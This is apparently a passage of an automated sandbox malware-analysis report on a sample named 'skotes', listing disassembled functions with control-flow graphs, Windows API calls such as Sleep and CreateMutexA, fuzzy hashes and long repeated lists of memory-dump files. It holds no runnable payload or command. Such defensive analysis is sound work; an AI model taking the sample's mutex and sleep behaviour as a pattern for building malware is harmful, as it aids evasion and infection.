                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 6ebfc06903bf2f5acb6caeba3088132b8bcb5abc3b4ec1d7738edc16232be511
                                                                                                                                                                    • Instruction ID: dd1c6fec98d481f4cac32ee83d2b4b92c860c0cb465b8866caac56d17746ed19
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ebfc06903bf2f5acb6caeba3088132b8bcb5abc3b4ec1d7738edc16232be511
                                                                                                                                                                    • Instruction Fuzzy Hash: D52167326052009BEB189B6CEC85BEDF763EBC1310F288658E068C73D5CB7599C08B62
                                                                                                                                                                    Function 0061A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 306 61a856-61a86e 307 61a870-61a87c 306->307 308 61a89c-61a89e 306->308 311 61a892-61a899 call 62d663 307->311 312 61a87e-61a88c 307->312 309 61a8a0-61a8a7 308->309 310 61a8a9-61a8b1 call 617d30 308->310 313 61a8eb-61a916 call 6280c0 309->313 322 61a8b3-61a8bb call 617d30 310->322 323 61a8e4-61a8e6 310->323 311->308 312->311 315 61a94e 312->315 319 61a953-61a987 Sleep CreateMutexA 315->319 320 61a94e call 646c6a 315->320 326 61a98e-61a994 319->326 320->319 322->323 330 61a8bd-61a8c5 call 617d30 322->330 323->313 328 61a9a7-61a9a8 326->328 329 61a996-61a998 326->329 329->328 331 61a99a-61a9a5 329->331 330->323 335 61a8c7-61a8cf call 617d30 330->335 331->328 335->323 338 61a8d1-61a8d9 call 617d30 335->338 338->323 341 61a8db-61a8e2 338->341 341->313
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: af38c25adf0a73f1dde2c4db748cad5362b87a3a231d87465350b1cfa04b4b02
                                                                                                                                                                    • Instruction ID: f7ddf378dc16e8b59370dda8142a16b4caaa1a07b61302f9cdfd062b890c7ce9
                                                                                                                                                                    • Opcode Fuzzy Hash: af38c25adf0a73f1dde2c4db748cad5362b87a3a231d87465350b1cfa04b4b02
                                                                                                                                                                    • Instruction Fuzzy Hash: E6216D7164A1008EFB64A7EC9C867FDB2639F81300F2C4D1AE148D73D2CB7649C18293
                                                                                                                                                                    Function 0061A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 283 61a34f-61a35b 284 61a371-61a39a call 62d663 283->284 285 61a35d-61a36b 283->285 291 61a3c8-61a916 call 6280c0 284->291 292 61a39c-61a3a8 284->292 285->284 286 61a93a 285->286 288 61a953-61a994 Sleep CreateMutexA 286->288 289 61a93a call 646c6a 286->289 299 61a9a7-61a9a8 288->299 300 61a996-61a998 288->300 289->288 293 61a3aa-61a3b8 292->293 294 61a3be-61a3c5 call 62d663 292->294 293->286 293->294 294->291 300->299 303 61a99a-61a9a5 300->303 303->299
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 30a072b7b4377fc945bf422b65d93d2fd2dff740262fb308fc537170747efaea
                                                                                                                                                                    • Instruction ID: 75e4c962f2e01686985a00b0a0f4e0233ec558f3db0fd89346b163386834db60
                                                                                                                                                                    • Opcode Fuzzy Hash: 30a072b7b4377fc945bf422b65d93d2fd2dff740262fb308fc537170747efaea
                                                                                                                                                                    • Instruction Fuzzy Hash: 34216A326052009BEB189BACDC857EDF763DBC2310F288659E468D77D5CB755AC08753
                                                                                                                                                                    Function 0064D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 342 64d82f-64d83a 343 64d83c-64d846 342->343 344 64d848-64d84e 342->344 343->344 345 64d87c-64d887 call 6475f6 343->345 346 64d867-64d878 RtlAllocateHeap 344->346 347 64d850-64d851 344->347 351 64d889-64d88b 345->351 348 64d853-64d85a call 649dc0 346->348 349 64d87a 346->349 347->346 348->345 355 64d85c-64d865 call 648e36 348->355 349->351 355->345 355->346
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0064A813,00000001,00000364,00000006,000000FF,?,0064EE3F,?,00000004,00000000,?,?), ref: 0064D870
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: 98ccb398826eb31bc7dce089197b4160725de904ea25b186134db354612d18f9
